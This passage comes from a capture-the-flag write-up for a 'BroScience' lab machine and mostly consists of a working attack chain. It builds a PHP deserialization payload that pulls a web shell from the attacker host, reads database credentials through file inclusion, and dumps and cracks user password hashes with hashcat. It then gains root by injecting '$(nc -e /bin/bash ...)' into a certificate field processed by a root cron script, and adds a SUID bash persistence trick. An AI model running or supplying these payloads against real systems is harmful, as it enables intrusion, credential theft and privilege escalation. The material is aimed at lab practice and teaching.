    <span class="nv">$a</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Avatar</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">imgPath</span><span class="p">);</span>
    <span class="nv">$a</span><span class="o">-&gt;</span><span class="nf">save</span><span class="p">(</span><span class="nv">$this</span><span class="o">-&gt;</span><span class="n">tmp</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>

<span class="nv">$payload</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">AvatarInterface</span><span class="p">();</span>
<span class="nv">$payload</span><span class="o">-&gt;</span><span class="n">imgPath</span> <span class="o">=</span> <span class="s2">"/var/www/html/rev.php"</span><span class="p">;</span>
<span class="nv">$payload</span><span class="o">-&gt;</span><span class="n">tmp</span> <span class="o">=</span> <span class="s2">"http://10.10.16.3/phpshell.php"</span><span class="p">;</span>

<span class="nv">$payload</span> <span class="o">=</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nb">serialize</span><span class="p">(</span><span class="nv">$payload</span><span class="p">));</span>

<span class="k">echo</span> <span class="nv">$payload</span><span class="p">;</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>Here, I used the same PHP code as before but with a slight modification. I created an object myself and set the variables to the directories and endpoints I desired. The <code class="language-plaintext highlighter-rouge">phpshell.php</code> file will be hosted on my system on a temporary python HTTP server, and will be transported to <code class="language-plaintext highlighter-rouge">/var/www/html</code> as <code class="language-plaintext highlighter-rouge">rev.php</code>. I then serialized and base64 encoded the string to use in the cookie.</p>

<p><img src="./img/encode.webp" alt="" /></p>

<p>It should look something like the stuff above. We do all the steps we mention and the results are the following -</p>

<p><img src="./img/split.webp" alt="" /></p>

<p>We should be able to run <code class="language-plaintext highlighter-rouge">rev.php</code> directly and get a working shell.</p>

<p><img src="./img/shell.webp" alt="" /></p>

<p>Very cool.</p>

<p>I tried looking for <code class="language-plaintext highlighter-rouge">user.txt</code> in one of the user directories in <code class="language-plaintext highlighter-rouge">/home</code> and it seems that I couldn’t access it as <code class="language-plaintext highlighter-rouge">www-data</code>.</p>

<p>I know that <code class="language-plaintext highlighter-rouge">bill</code> is a user on the site and must have a password. We can check the PostgreSQL server for password hashes and crack them.</p>

<p>If you remember <code class="language-plaintext highlighter-rouge">db_connect.php</code>, we can pull it up using the LFI we found.</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="nv">$db_host</span> <span class="o">=</span> <span class="s2">"localhost"</span><span class="p">;</span>
<span class="nv">$db_port</span> <span class="o">=</span> <span class="s2">"5432"</span><span class="p">;</span>
<span class="nv">$db_name</span> <span class="o">=</span> <span class="s2">"broscience"</span><span class="p">;</span>
<span class="nv">$db_user</span> <span class="o">=</span> <span class="s2">"dbuser"</span><span class="p">;</span>
<span class="nv">$db_pass</span> <span class="o">=</span> <span class="s2">"RangeOfMotion%777"</span><span class="p">;</span>
<span class="nv">$db_salt</span> <span class="o">=</span> <span class="s2">"NaCl"</span><span class="p">;</span>

<span class="nv">$db_conn</span> <span class="o">=</span> <span class="nb">pg_connect</span><span class="p">(</span><span class="s2">"host=</span><span class="si">{</span><span class="nv">$db_host</span><span class="si">}</span><span class="s2"> port=</span><span class="si">{</span><span class="nv">$db_port</span><span class="si">}</span><span class="s2"> dbname=</span><span class="si">{</span><span class="nv">$db_name</span><span class="si">}</span><span class="s2"> user=</span><span class="si">{</span><span class="nv">$db_user</span><span class="si">}</span><span class="s2"> password=</span><span class="si">{</span><span class="nv">$db_pass</span><span class="si">}</span><span class="s2">"</span><span class="p">);</span>

<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$db_conn</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">die</span><span class="p">(</span><span class="s2">"&lt;b&gt;Error&lt;/b&gt;: Unable to connect to database"</span><span class="p">);</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>Awesome. We have the user, database name and password. We also seem to have a salt here (Literally NaCL. Funny). This hints to me that, the hashes are probably salted. We should keep that in mind. Let’s try to view the tables.</p>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>remote<span class="o">)</span> www-data@broscience:/home/bill<span class="nv">$ </span>psql <span class="nt">-h</span> localhost <span class="nt">-p</span> 5432 <span class="nt">-U</span> dbuser <span class="nt">-d</span> broscience <span class="nt">-W</span>
Password:
psql <span class="o">(</span>13.9 <span class="o">(</span>Debian 13.9-0+deb11u1<span class="o">))</span>
SSL connection <span class="o">(</span>protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off<span class="o">)</span>
Type <span class="s2">"help"</span> <span class="k">for </span>help.

broscience-&gt; <span class="se">\d</span>t
           List of relations
 Schema |   Name    | Type  |  Owner
<span class="nt">--------</span>+-----------+-------+----------
 public | comments  | table | postgres
 public | exercises | table | postgres
 public | <span class="nb">users</span>     | table | postgres
<span class="o">(</span>3 rows<span class="o">)</span>
</code></pre></div></div>

<p>The passwords are most likely in <code class="language-plaintext highlighter-rouge">users</code> so let’s check that.</p>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nb">id</span> |   username    |             password             |            email             |         activation_code          | is_activated | is_admin |         date_created
<span class="nt">----</span>+---------------+----------------------------------+------------------------------+----------------------------------+--------------+----------+-------------------------------
  1 | administrator | 15657792073e8a843d4f91fc403454e1 | administrator@broscience.htb | OjYUyL9R4NpM9LOFP0T4Q4NUQ9PNpLHf | t            | t        | 2019-03-07 02:02:22.226763-05
  2 | bill          | 13edad4932da9dbb57d9cd15b66ed104 | bill@broscience.htb          | WLHPyj7NDRx10BYHRJPPgnRAYlMPTkp4 | t            | f        | 2019-05-07 03:34:44.127644-04
  3 | michael       | bd3dad50e2d578ecba87d5fa15ca5f85 | michael@broscience.htb       | zgXkcmKip9J5MwJjt8SZt5datKVri9n3 | t            | f        | 2020-10-01 04:12:34.732872-04
  4 | john          | a7eed23a7be6fe0d765197b1027453fe | john@broscience.htb          | oGKsaSbjocXb3jwmnx5CmQLEjwZwESt6 | t            | f        | 2021-09-21 11:45:53.118482-04
  5 | dmytro        | 5d15340bded5b9395d5d14b9c21bc82b | dmytro@broscience.htb        | 43p9iHX6cWjr9YhaUNtWxEBNtpneNMYm | t            | f        | 2021-08-13 10:34:36.226763-04
<span class="o">(</span>5 rows<span class="o">)</span>
</code></pre></div></div>

<p>Now we have all the hashes. Since we are only interested in <code class="language-plaintext highlighter-rouge">bill</code>, we solely crack his password to save some time (Although I did crack others).</p>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Tmp <span class="o">&gt;</span> <span class="nb">cat hash                                                                                                                             </span>10s root@kali 02:10:19 AM
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: <span class="nb">hash</span>
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ 13edad4932da9dbb57d9cd15b66ed104:NaCl
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
~/Tmp <span class="o">&gt;</span> hashcat <span class="nt">-a</span> 0 <span class="nb">hash</span> /usr/share/wordlists/rockyou.txt <span class="nt">-m</span> 20 <span class="nt">--show</span>                                                                          root@kali 02:10:25 AM
13edad4932da9dbb57d9cd15b66ed104:NaCl:iluvhorsesandgym
</code></pre></div></div>

<p>Here I added the salt <code class="language-plaintext highlighter-rouge">NaCl</code> for hashcat to work with and here <code class="language-plaintext highlighter-rouge">-m 20</code> represents the <code class="language-plaintext highlighter-rouge">md5($salt,$pass)</code> mode. Now, we can use this to <code class="language-plaintext highlighter-rouge">su</code> as <code class="language-plaintext highlighter-rouge">bill</code> and get <code class="language-plaintext highlighter-rouge">user.txt</code>.</p>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>remote<span class="o">)</span> www-data@broscience:/home/bill<span class="nv">$ </span>su bill
Password:
bill@broscience:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
4c1XXXXXXXXXXXXXXXXXXXXXXXX11671
bill@broscience:~<span class="err">$</span>
</code></pre></div></div>

<p>Time for root. Root is also pretty interesting. After running l and finding nothing much, my next step is usually to just run <code class="language-plaintext highlighter-rouge">PsPy</code> and see if I missed out on some regularly running processes.</p>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>remote<span class="o">)</span> bill@broscience:/home/bill<span class="nv">$ </span>./pspy64s <span class="nt">-r</span> /usr /tmp /etc /home /var /opt
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events <span class="o">(</span><span class="nv">colored</span><span class="o">=</span><span class="nb">true</span><span class="o">)</span>: <span class="nv">processes</span><span class="o">=</span><span class="nb">true</span> | file-system-events<span class="o">=</span><span class="nb">false</span> <span class="o">||</span>| Scannning <span class="k">for </span>processes every 100ms and on inotify events <span class="o">||</span>| Watching directories: <span class="o">[</span>/usr] <span class="o">(</span>recursive<span class="o">)</span> | <span class="o">[]</span> <span class="o">(</span>non-recursive<span class="o">)</span>
Draining file system events due to startup...
<span class="k">done
</span>2023/01/23 02:16:00 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>1      | /sbin/init
2023/01/23 02:16:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>25633  | /usr/sbin/CRON <span class="nt">-f</span>
2023/01/23 02:16:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>25635  | /bin/bash /root/cron.sh
2023/01/23 02:16:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>25634  | /bin/sh <span class="nt">-c</span> /root/cron.sh
2023/01/23 02:16:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>25637  | /bin/bash /opt/renew_cert.sh /home/bill/Certs/broscience.crt
2023/01/23 02:16:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>25636  | <span class="nb">timeout </span>10 /bin/bash <span class="nt">-c</span> /opt/renew_cert.sh /home/bill/Certs/broscience.crt
</code></pre></div></div>

<p>Look at the last two lines (There was more output but it’s omitted). A script called <code class="language-plaintext highlighter-rouge">renew_cert.sh</code> runs as root on a cert called <code class="language-plaintext highlighter-rouge">broscience.crt</code>. Let’s take a look at this script.</p>

<p><em>Sadly, <code class="language-plaintext highlighter-rouge">pspy</code> wasn’t running without the <code class="language-plaintext highlighter-rouge">-r</code> flag. I am not sure why it was needed since the same directories without <code class="language-plaintext highlighter-rouge">-r</code> work with <code class="language-plaintext highlighter-rouge">-r</code>. Seemed like an issue with the system itself.</em></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>

<span class="k">if</span> <span class="o">[</span> <span class="s2">"$#"</span> <span class="nt">-ne</span> 1 <span class="o">]</span> <span class="o">||</span> <span class="o">[</span> <span class="nv">$1</span> <span class="o">==</span> <span class="s2">"-h"</span> <span class="o">]</span> <span class="o">||</span> <span class="o">[</span> <span class="nv">$1</span> <span class="o">==</span> <span class="s2">"--help"</span> <span class="o">]</span> <span class="o">||</span> <span class="o">[</span> <span class="nv">$1</span> <span class="o">==</span> <span class="s2">"help"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
    </span><span class="nb">echo</span> <span class="s2">"Usage: </span><span class="nv">$0</span><span class="s2"> certificate.crt"</span><span class="p">;</span>
    <span class="nb">exit </span>0<span class="p">;</span>
<span class="k">fi

if</span> <span class="o">[</span> <span class="nt">-f</span> <span class="nv">$1</span> <span class="o">]</span><span class="p">;</span> <span class="k">then

    </span>openssl x509 <span class="nt">-in</span> <span class="nv">$1</span> <span class="nt">-noout</span> <span class="nt">-checkend</span> 86400 <span class="o">&gt;</span> /dev/null

    <span class="k">if</span> <span class="o">[</span> <span class="nv">$?</span> <span class="nt">-eq</span> 0 <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span><span class="nb">echo</span> <span class="s2">"No need to renew yet."</span><span class="p">;</span>
        <span class="nb">exit </span>1<span class="p">;</span>
    <span class="k">fi

    </span><span class="nv">subject</span><span class="o">=</span><span class="si">$(</span>openssl x509 <span class="nt">-in</span> <span class="nv">$1</span> <span class="nt">-noout</span> <span class="nt">-subject</span> | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s2">"="</span> <span class="nt">-f2-</span><span class="si">)</span>

    <span class="nv">country</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$subject</span> | <span class="nb">grep</span> <span class="nt">-Eo</span> <span class="s1">'C = .{2}'</span><span class="si">)</span>
    <span class="nv">state</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$subject</span> | <span class="nb">grep</span> <span class="nt">-Eo</span> <span class="s1">'ST = .*,'</span><span class="si">)</span>
    <span class="nv">locality</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$subject</span> | <span class="nb">grep</span> <span class="nt">-Eo</span> <span class="s1">'L = .*,'</span><span class="si">)</span>
    <span class="nv">organization</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$subject</span> | <span class="nb">grep</span> <span class="nt">-Eo</span> <span class="s1">'O = .*,'</span><span class="si">)</span>
    <span class="nv">organizationUnit</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$subject</span> | <span class="nb">grep</span> <span class="nt">-Eo</span> <span class="s1">'OU = .*,'</span><span class="si">)</span>
    <span class="nv">commonName</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="nv">$subject</span> | <span class="nb">grep</span> <span class="nt">-Eo</span> <span class="s1">'CN = .*,?'</span><span class="si">)</span>
    <span class="nv">emailAddress</span><span class="o">=</span><span class="si">$(</span>openssl x509 <span class="nt">-in</span> <span class="nv">$1</span> <span class="nt">-noout</span> <span class="nt">-email</span><span class="si">)</span>

    <span class="nv">country</span><span class="o">=</span><span class="k">${</span><span class="nv">country</span>:4<span class="k">}</span>
    <span class="nv">state</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="k">${</span><span class="nv">state</span>:5<span class="k">}</span> | <span class="nb">awk</span> <span class="nt">-F</span>, <span class="s1">'{print $1}'</span><span class="si">)</span>
    <span class="nv">locality</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="k">${</span><span class="nv">locality</span>:3<span class="k">}</span> | <span class="nb">awk</span> <span class="nt">-F</span>, <span class="s1">'{print $1}'</span><span class="si">)</span>
    <span class="nv">organization</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="k">${</span><span class="nv">organization</span>:4<span class="k">}</span> | <span class="nb">awk</span> <span class="nt">-F</span>, <span class="s1">'{print $1}'</span><span class="si">)</span>
    <span class="nv">organizationUnit</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="k">${</span><span class="nv">organizationUnit</span>:5<span class="k">}</span> | <span class="nb">awk</span> <span class="nt">-F</span>, <span class="s1">'{print $1}'</span><span class="si">)</span>
    <span class="nv">commonName</span><span class="o">=</span><span class="si">$(</span><span class="nb">echo</span> <span class="k">${</span><span class="nv">commonName</span>:5<span class="k">}</span> | <span class="nb">awk</span> <span class="nt">-F</span>, <span class="s1">'{print $1}'</span><span class="si">)</span>

    <span class="nb">echo</span> <span class="nv">$subject</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">""</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">"Country     =&gt; </span><span class="nv">$country</span><span class="s2">"</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">"State       =&gt; </span><span class="nv">$state</span><span class="s2">"</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">"Locality    =&gt; </span><span class="nv">$locality</span><span class="s2">"</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">"Org Name    =&gt; </span><span class="nv">$organization</span><span class="s2">"</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">"Org Unit    =&gt; </span><span class="nv">$organizationUnit</span><span class="s2">"</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">"Common Name =&gt; </span><span class="nv">$commonName</span><span class="s2">"</span><span class="p">;</span>
    <span class="nb">echo</span> <span class="s2">"Email       =&gt; </span><span class="nv">$emailAddress</span><span class="s2">"</span><span class="p">;</span>

    <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">Generating certificate..."</span><span class="p">;</span>
    openssl req <span class="nt">-x509</span> <span class="nt">-sha256</span> <span class="nt">-nodes</span> <span class="nt">-newkey</span> rsa:4096 <span class="nt">-keyout</span> /tmp/temp.key <span class="nt">-out</span> /tmp/temp.crt <span class="nt">-days</span> 365 <span class="o">&lt;&lt;&lt;</span><span class="s2">"</span><span class="nv">$country</span><span class="s2">
    </span><span class="nv">$state</span><span class="s2">
    </span><span class="nv">$locality</span><span class="s2">
    </span><span class="nv">$organization</span><span class="s2">
    </span><span class="nv">$organizationUnit</span><span class="s2">
    </span><span class="nv">$commonName</span><span class="s2">
    </span><span class="nv">$emailAddress</span><span class="s2">
    "</span> 2&gt;/dev/null

    /bin/bash <span class="nt">-c</span> <span class="s2">"mv /tmp/temp.crt /home/bill/Certs/</span><span class="nv">$commonName</span><span class="s2">.crt"</span>
<span class="k">else
    </span><span class="nb">echo</span> <span class="s2">"File doesn't exist"</span>
    <span class="nb">exit </span>1<span class="p">;</span>
<span class="k">fi</span>
</code></pre></div></div>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">(</span>remote<span class="o">)</span> bill@broscience:/home/bill<span class="nv">$ </span>openssl req <span class="nt">-x509</span> <span class="nt">-sha256</span> <span class="nt">-nodes</span> <span class="nt">-newkey</span> rsa:4096 <span class="nt">-keyout</span> /tmp/temp.key <span class="nt">-out</span> /home/bill/Certs/broscience.crt <span class="nt">-days</span> 1
Generating a RSA private key
.++++
..++++
writing new private key to <span class="s1">'/tmp/temp.key'</span>
<span class="nt">-----</span>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter <span class="s1">'.'</span>, the field will be left blank.
<span class="nt">-----</span>
Country Name <span class="o">(</span>2 letter code<span class="o">)</span> <span class="o">[</span>AU]:
State or Province Name <span class="o">(</span>full name<span class="o">)</span> <span class="o">[</span>Some-State]:
Locality Name <span class="o">(</span>eg, city<span class="o">)</span> <span class="o">[]</span>:
Organization Name <span class="o">(</span>eg, company<span class="o">)</span> <span class="o">[</span>Internet Widgits Pty Ltd]:
Organizational Unit Name <span class="o">(</span>eg, section<span class="o">)</span> <span class="o">[]</span>:
Common Name <span class="o">(</span>e.g. server FQDN or YOUR name<span class="o">)</span> <span class="o">[]</span>:<span class="si">$(</span>nc <span class="nt">-e</span> /bin/bash 10.10.16.3 1235<span class="si">)</span>
Email Address <span class="o">[]</span>:
</code></pre></div></div>

<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/Tmp <span class="o">&gt;</span> rlwrap nc <span class="nt">-nlvp</span> 1235                                                                                                               2m 4s root@kali 02:26:45 AM
listening on <span class="o">[</span>any] 1235 ...
connect to <span class="o">[</span>10.10.16.3] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.195] 33366
<span class="nb">cat</span> /root/root.txt
444e2232dXXXXXXXXXXXXXXXXXXXXX73f1
</code></pre></div></div>

<p>The reverse shell you get with this method breaks off very fast. You can instead do something like</p>

<p><code class="language-plaintext highlighter-rouge">cp /bin/bash /dev/shm/; chown root:root /dev/shm/bash; chmod +s /dev/shm/bash</code></p>

<p>to get a more stable shell.</p>

<p>I hope you enjoyed this read. Thanks for reading :))).</p>

    </section>
  </div>
</body>

</html>
